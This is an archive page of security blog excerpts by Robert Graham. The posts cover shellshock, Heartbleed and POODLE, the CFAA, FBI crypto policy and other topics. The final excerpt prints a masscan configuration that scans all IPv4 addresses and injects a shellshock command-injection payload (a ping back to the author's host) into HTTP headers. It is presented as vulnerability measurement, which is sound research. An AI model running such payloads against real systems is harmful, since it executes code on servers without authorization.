Robert Graham

Author Archives: Robert Graham

Review: The Peripheral, by William Gibson

After four years, William Gibson is finally coming out with a new book, “The Peripheral”. Time to preorder now. http://www.amazon.com/gp/product/B00INIXKV2

There’s not much to review. If you like Gibson’s work, you’ll like this book. (Also, if you don't like Gibon's work, then you are wrong).

What I like about Gibson’s work is his investment in the supporting characters, which are often more interesting than the main characters. Each has a complex backstory, but more importantly, each has a story that unfolds during the book. It’s as if Gibson takes each minor character and writes a short story for them, where they grow and evolve, then combines them all into the main story. It’s a little confusing at the start, because it’s sometimes hard to identify which are the main characters, but it pays off in the end. (I experienced that in this book, among the numerous characters he introduced at the start, it was the least interesting ones that turned out to be the main characters -- it's not that they were boring, it's that they took longer to develop).

One departure from his normal work is that this book is maybe a little more autobiographical. Continue reading

The FBI’s statements are Orwellian

Recently, FBI Director James Comey gave a speech at the Brookings Institute decrying crypto. It was transparently Orwellian, arguing for a police-state. In this post, I'll demonstrate why, quoting bits of the speech.


"the FBI has a sworn duty to keep every American safe from crime and terrorism"
"The people of the FBI are sworn to protect both security and liberty"

This is not true. The FBI's oath is to "defend the Constitution". Nowhere in the oath does it say "protect security" or "keep people safe".

This detail is important. Tyrants suppress civil liberties in the name of national security and public safety. This oath taken by FBI agents, military personnel, and the even the president, is designed to prevent such tyrannies.

Comey repeatedly claims that FBI agents both understand their duty and are committed to it. That Comey himself misunderstands his oath disproves both assertions. This reinforces our belief that FBI agents do not see their duty as protecting our rights, but instead see rights as an impediment in pursuit of some other duty.


Freedom is Danger

The book 1984 describes the concept of "doublethink", with political slogans as examples: "War is Peace", "Ignorance is Strength", and Continue reading

Some POODLE notes

Heartbleed and Shellshock allowed hacks against servers (meaning websites and such). POODLE allows hacking clients (your webbrowser and such). If Hearbleed/Shellshock merited a 10, then this attack is only around a 5.

It requires MitM (man-in-the-middle) to exploit. In other words, the hacker needs to be able to to tap into the wires between you and the website you are browsing, which is difficult to do. This means you are probably safe from hackers at home, because hackers can't tap backbone links. But, since the NSA can tap into such links, it's probably easy for them. However, when using the local Starbucks or other unencrypted WiFi, you are in grave danger from this hack from hackers sitting the table next to you.

It requires, in almost all cases, JavaScript running in the browser. That's because the attacker needs to MitM thousands of nearly identical connections that can fail. There are possibly rare cases where such connections may happen (like automated control systems), but JavaScript is nearly a requirement. That means your Twitter app in your iPhone is likely safe, as the attacker can't run JavaScript in the app.

It doesn't hack computers, but crack encryption. It reveals previously encrypted data.

Continue reading

Standards are a farce

Today (October 14) is "World Standards Day", celebrating the founding of the ISO, also known as the "International Standards Organization". It's a good time to point out that people are wrong about standards.

You are reading this blog post via "Internet standards". It's important to note that through it's early existence, the Internet was officially not a standard. Through the 1980s, the ISO was busy standardizing a competing set of internetworking standards.

What made the Internet different is that it's standards were de facto not de jure. In other words, the Internet standards body, the IETF, documented things that worked, not how they should work. Whenever somebody came up with a new protocol to replace an old one, and if people started using it, then the IETF would declare this as "something people are using". Protocols were documented so that others could interoperate with them if they wanted, but there was no claim that they should. Internet evolution in these times was driven by rogue individualism -- people rushed to invent new things with waiting for the standards body to catch up.

The ISO's approach was different. Instead of individualism, it was based on "design by committee", where committees were Continue reading

Don’t sign that CFAA petition

This White House petition reforming the CFAA/DMCA is foolish. Don't sign it.

The problem is that "reform" means nothing. It doesn't state exactly which reforms the petitioners want. That means politicians will deliver on what they asked, reforming the DMCA/CFAA, but in the opposite direction. The mood in Washington D.C. is one of great fear of Chinese hackers and cyberterorrists. Once you start reform, these forces will take over and drive it the other way.

In other words, the petition is like somebody on a submarine saying "the air is stuffy, let's open a window and let some fresh air in". It's best to keep that window closed rather than getting drowned.

A second problem is the declaration that "safe code" is the problem. That will encourage law-makers to solve that problem with legislation requiring manufacturers to follow rules -- without needing weaken the DCMA/CFAA. This is bad. So far rule-based security like Common Criteria and PCI certification have proven to be an enormous burden that does little to address the problem.

Lastly, there is the problem that this is a "White House" petition. The president doesn't make laws, s/he enforces them. It's appropriate to petition the White House Continue reading

Response to Kathy Sierra

People are asking me about this post from Kathy Sierra. It’s inaccurate, twisted, and personally insulting. That Kathy was doxxed and harassed 7 years is indeed an awful thing, but that doesn’t justify her own bad behavior toward others.

I always defend targets of lynch mobs, such as accused Boston Bomber Dzhokhar Tsarnaev. To the right is a picture of what appears to be Tsarnaev placing the bomb right behind 9 year old boy Martin Richards who died in the blast. I feel sick to my stomach looking at it. But here’s the thing: Tsarnaev is an American citizen, and I will vigorously defend his rights to due process. When they violated his civil rights, interrogating him for days while he hung near death in his hospital bed, begging for a lawyer, I vocally condemned this. All fruits of that interrogation need to be thrown out, even if it means Tsarnaev goes free. And I have no problem saying this to the face of Martin Richard’s parents.

Weev may be a bad human being, but he’s not as vile as mass bomber. I likewise defend him from lynch mobs. His arbitrary conviction and imprisonment under the CFAA was a gross Continue reading

Wget off the leash

As we all know, to grab a website with wget, we'll use the "-r" option to "recurse" through all the links. There is also the '-H' option, means that wget won't restrict itself to just one host. In other words, with '-r -H' together, it'll try to spider the entire Internet. So I did that to see what would happen.

Well, for a 32-bit bit process, what happened is that after more than a month, it ran out of memory. It maintained an ever growing list of URLs that it has to visit, which can easily run in the millions. At a hundred bytes per URL and 2-gigabytes of virtual memory, it'll run out of memory after 20 million URLs -- far short of the billions on the net. That's what you see below, where 'wget' has crashed exhausting memory. Below that I show the command I used to launch the process, starting at cnn.com as the seed with a max timeout of 5 seconds.



How much data did I download from the Internet? According to 'du', the answer is 18-gigabytes, as seen in the following screenshot:



It reached 79425 individual domains, far short of the millions it held Continue reading

Six-month anniversary scan for Heartbleed

I just launched my six-month anniversary scan for Heartbleed. I'll start reporting early results tomorrow afternoon. I'm dialing the scan to run slowly and spreading it across four IP addresses (and 32k ports) in order to avoid unduly alarming people.

If you would like the results of the scan for your subnet, send us your address ranges to our "abuse@" email address. We'll lookup the abuse contact email for those ranges and send you what we found for that range. (This offer good through the end of October 2014).



Here is a discussion of the options.

--conf /etc/masscan/masscan.conf
You don't see this option, but it's the default. This is where we have the 'excluderanges' configured. Because we exclude everyone who contacts us an "opts-out" of our white-hat scans, we are down to scanning only 3.5 billion hosts now, out of around 4 billion.

0.0.0.0/0
The the "/0" means "the entire Internet". Actually, any valid IPv4 address can replace the 0.0.0.0 and it'll produce the same results, such as "127.0.0.0/0" to amuse your friends.

-p443
This says to scan on port 443, the default SSL port. At some point in Continue reading

Who named “shellshock”?

Because it's terribly important to cybersec, many are debating the origin of the name "shellshock". I thought I'd write up the definitive answer.

The answer is that it came from this tweet by Andreas Lindh. That's the absolute origin of the term. Andreas made it up himself.



Also, to some extent Davi Ottenheimer deserves some credit for starting the conversation among a bunch of people with his tweet saying "it's not big until there's a logo". Lots of people posted logos as that point.

Also to some extent I deserve some credit for then pimping the "shellshock" name in my blogposts, which received a lot of attention in the early hours of the shellshock crisis. As you can see from the pageview stats below, these posts got a lot of attention. Also, most of the early news stories on "real" news websites referenced me and my posts. Those news sites got the name from me, and I got it from Andreas and nobody else.



I suspect what really helped it along is that when I scanned the Internet for the bug, putting it in everybody's webserver logs. I included a pointer to the "shellshock scan" post in the Continue reading

Understanding the HP split

HP is splitting itself into "enterprise" and "consumer" companies. Why the split? Isn't the goal of big companies to get bigger? Well, no, that's just the cynical view of companies. The actual goal is to deliver value to stockholders. Splitting delivers value in two ways. The first is that it "exposes" the underlying business. The second is that it avoids dis-economies of scale.

Conglomerates like GE (General Electric) have a problem. While some businesses do well and grow, other businesses fail and shrink. You can't buy stock in the individual components of GE's business you think are growing, you have to take all or none. GE Medical has been growing fast, but you can't invest in it individually.

Thus, big companies frequently spin out such companies, either to divest themselves of the dead weight that isn't growing, or conversely, to let a growing part of these business to fly free without being held back by the deadweight. The fast growing parts of a business aren't inherently better. They tend to also be riskier, meaning that while their stock may surge, they have equal probability of going bankrupt soon.

We can see how this philosophy worked in the case of HP's Continue reading

Two Minutes of Hate: Marriot deauthing competing WiFi

Do you stand for principle -- even when it's against your interests? Would you defend the free-speed rights of Nazis, for example? The answer is generally "no", few people stand for principle. We see that in this morning's news story about Marriott jamming (actually deauthing) portable WiFi hotspots in order to force customers to use their own high-priced WiFi.

The principle I want to discuss here is "arbitrary and discriminator enforcement". It was the principle behind the Aaron Swartz and Andrew "weev" Auernheimer cases. The CFAA is a vague law where it is impossible to distinguish between allowed and forbidden behavior. Swartz and Weev were prosecuted under the CFAA not because what they did was "unauthorized access", but because they pissed off the powerful. Prosecutors then interpreted the laws to suite their purposes.


The same thing is true in the Marriott case. Deauthing Wifi is common practice on large campuses everywhere, at company headquarters, hospitals, and college campuses. They do this for security reasons, to prevent rogue access-points from opening up holes behind the firewall. It's also used at the DefCon conference, to prevent hostile access-points from tricking people by using "DefCon" in their name.

Section 333 of the Communications Continue reading

Opt-in for upcoming Heartbleed results

On October 8, the 6-month anniversary of Heartbleed, I'm going to scan the Internet again for it. I should find about 250k devices are still vulnerable. These are things like webcams, NAS boxes, forgotten VM instances, development machines, and so on -- few real "web servers" will be vulnerable.

I will, of course, exclude from my scan everyone who has asked to be excluded. My scan list is down to only 3.5 billion hosts because of all the exclusions I do. However, asking for whitehats to exclude you from their scans is not a smart security strategy. Therefore, if you are on our exclude list, I suggest you do the reverse: opt back in.

I mention this because we are going to try something new: allow people to opt-in to the results. Send us an email, and we'll send the results of our Heartbleed scan for your address range to the "abuse" address registered for that address range.

Reading the Silk Road configuration

Many of us believe it wasn't the FBI who discovered the hidden Silk Road server, but the NSA (or other intelligence organization). We believe the FBI is using "parallel construction", meaning creating a plausible story of how they found the server to satisfy the courts, but a story that isn't true.

Today, Brian Krebs released data from the defense team that seems to confirm the "parallel construction" theory. I thought I'd write up a technical discussion of what was found.

The Tarbell declaration


A month ago, the FBI released a statement from the lead investigator, Christopher Tarbell, describing how he discovered the hidden server ("the Tarbell declaration"). This document had four noticeable defects.

The first is that the details are vague. It is impossible for anybody with technical skill (such as myself) to figure out what he did.

The second problem is that some of the details are impossible, such as seeing the IP address in the "packet headers".

Thirdly, his saved none of the forensics data. You'd have thought that had this been real, he would have at least captured packet logs or even screenshots of what he did. I'm a technical blogger. I document this sort Continue reading

Right-winger explains what’s wrong with ComputerCop

The EFF has a good article on ComputerCop. Police departments have lashed back, saying the EFF is an "ultra-liberal organization that is not in any way credible on this". While it's true the EFF is a bunch of leftists, I'm a right-winger -- and I agree with them in this case. Maybe they'll find my right-wing criticisms of ComputerCop more believable.


The basic issue is that this program isn't "protection", but is instead a "virus". It's the same software hackers use to spy on computers. It's the same software that jealous lovers secretly install on their partner's computer. Some of the copies the police give out will be used for the intended purpose (parents hacking their children's computers), but also some copies will end-up in the hands of evil-doers who use it for hacking. When investigating domestic abuse cases over the next few years, police will find their own software on the victim's computer, placed there by the abuser.

Monitoring your child's online activities is a good thing. Hacking your child's computers is probably a bad thing. It's not the sort of activity police departments should be encouraging.

The software maker exploits the fact that rural county sheriffs are Continue reading

The shockingly obsolete code of bash

One of the problems with bash is that it's simply obsolete code. We have modern objective standards about code quality, and bash doesn't meet those standards. In this post, I'm going to review the code, starting with the function that is at the heart of the #shellshock bug, initialize_shell_variables().

K&R function headers


The code uses the K&R function headers which have been obsolete since the mid-1980s.


I don't think it's there to support older compilers, because other parts of the code use modern headers. I think it's there simply because they are paranoid about making unnecessary changes to the code. The effect of this is that it messes up static analysis, both simple compiler warnings as well as advanced security analysis tools.

It's also a stylistic issue. There's only one rule to coding style, which is "avoid surprising things", and this is surprising.

Ultimately, this isn't much of an issue, but a symptom that there is something seriously wrong with this code.

Global variables everywhere


Global variables are bad. Your program should have a maximum of five, for such things as the global debug or logging flag. Bash has hundred(s) of global variables.


Also note that a large number of Continue reading

Do shellshock scans violate CFAA?

In order to measure the danger of the bash shellshock vulnerability, I scanned the Internet for it. Many are debating whether this violates the CFAA, the anti-hacking law.

The answer is that everything technically violates that law. The CFAA is vaguely written allowing discriminatory prosecution by the powerful, such as when AT&T prosecuted 'weev' for downloading iPad account information that they had made public on their website. Such laws need to be challenged, but sadly, those doing the challenging tend to be the evil sort, like child molesters, terrorists, and Internet trolls like weev. A better way to challenge the law is with a more sympathetic character. Being a good guy defending websites still doesn't justify unauthorized access (if indeed it's unauthorized), but it'll give credence to the argument that the law is unconstitutionally vague because I'm obviously not trying to "get away with something".


Law is like code. The code says (paraphrased):
intentionally accesses the computer without authorization thereby obtaining information
There are two vague items here, "intentionally" and "authorization". (The "access" and "information" are also vague, but we'll leave that for later).


The problem with the law is that it was written in the 1980s before the web Continue reading

Many eyes theory conclusively disproven

Just because a bug was found in open-source does not disprove the "many eyes" theory. Instead, it's bugs being found now that should've been found sometime in the last 25 years.

Many eyes are obviously looking at bash now, and they are finding fairly obvious problems. It's obvious that the parsing code in bash is deeply flawed, though any particular bug isn't so obvious. If many eyes had been looking at bash over the past 25 years, these bugs would've been found a long time ago.

Thus, we know that "many eyes" haven't been looking at bash.

The theory is the claim promoted by open-source advocates that "many eyes makes bugs shallow", the theory that open-source will have fewer bugs (and fewer security problems) since anyone can look at the code.

What we've seen is that, in fact, very few people ever read code, even when it's open-source. The average programmers writes 10x more code than they read. The only people where that equation is reversed are professional code auditors -- and they are hired primarily to audit closed-source code. Companies like Microsoft pay programmers to review code because reviewing code is not otherwise something programmers like to do.

From Continue reading

Shellshock is 20 years old (get off my lawn)

The bash issue is 20 years old. By this I don't mean the actual bug is that old (though it appears it might be), but that we've known that long that passing HTTP values to shell scripts is a bad idea.

My first experience with this was in 1995. I worked for "Network General Corporation" (which would later merge with McAfee Associates). At the time, about 1000 people worked for the company. We made the Sniffer, the original packet-sniffer that gave it's name to the entire class of products.

One day, the head of IT comes to me with an e-mail from some unknown person informing us that our website was vulnerable. He was in standard denial, asking me to confirm that "this asshole is full of shit".

But no, whoever had sent us the email was correct, and obviously so. I was enough of a security expert that our IT guy would come to me, but I hadn't considered that bug before (to my great embarrassment), but of course, one glance at the email and I knew it was true. I didn't have to try it out on our website, because it was self evident in the way that Continue reading

Bash ‘shellshock’ bug is wormable

Early results from my scan: there's about 3000 systems vulnerable just on port 80, just on the root "/" URL, without Host field. That doesn't sound like a lot, but that's not where the bug lives. Update: oops, my scan broke early in the process and stopped capturing the responses -- it's probably a lot more responses that than.

Firstly, only about 1 in 50 webservers respond correctly without the proper Host field. Scanning with the correct domain names would lead to a lot more results -- about 50 times more.

Secondly, it's things like CGI scripts that are vulnerable, deep within a website (like CPanel's /cgi-sys/defaultwebpage.cgi). Getting just the root page is the thing least likely to be vulnerable. Spidering the site, and testing well-known CGI scripts (like the CPanel one) would give a lot more results, at least 10x.

Thirdly, it's embedded webserves on odd ports that are the real danger. Scanning for more ports would give a couple times more results.

Fourthly, it's not just web, but other services that are vulnerable, such as the DHCP service reported in the initial advisory.

Consequently, even though my light scan found only 3000 results, this thing is clearly Continue reading

Bash ‘shellshock’ scan of the Internet

NOTE: malware is now using this as their User-agent. I haven't run a scan now for over two days.

I'm running a scan right now of the Internet to test for the recent bash vulnerability, to see how widespread this is. My scan works by stuffing a bunch of "ping home" commands in various CGI variables. It's coming from IP address 209.126.230.72.

The configuration file for masscan looks something like:

target-ip = 0.0.0.0/0
port = 80
banners = true
http-user-agent = shellshock-scan (http://blog.erratasec.com/2014/09/bash-shellshock-scan-of-internet.html)
http-header[Cookie] = () { :; }; ping -c 3 209.126.230.74
http-header[Host] = () { :; }; ping -c 3 209.126.230.74
http-header[Referer] = () { :; }; ping -c 3 209.126.230.74

(Actually, these last three options don't quite work due to bug, so you have to manually add them to the code https://github.com/robertdavidgraham/masscan/blob/master/src/proto-http.c#L120)

Some earlier shows that this bug is widespread:
A discussion of the results is at the next blogpost here. The upshot is this: while this scan found only a few thousand systems (because it's intentionally limited), it looks like the potential for a worm is high.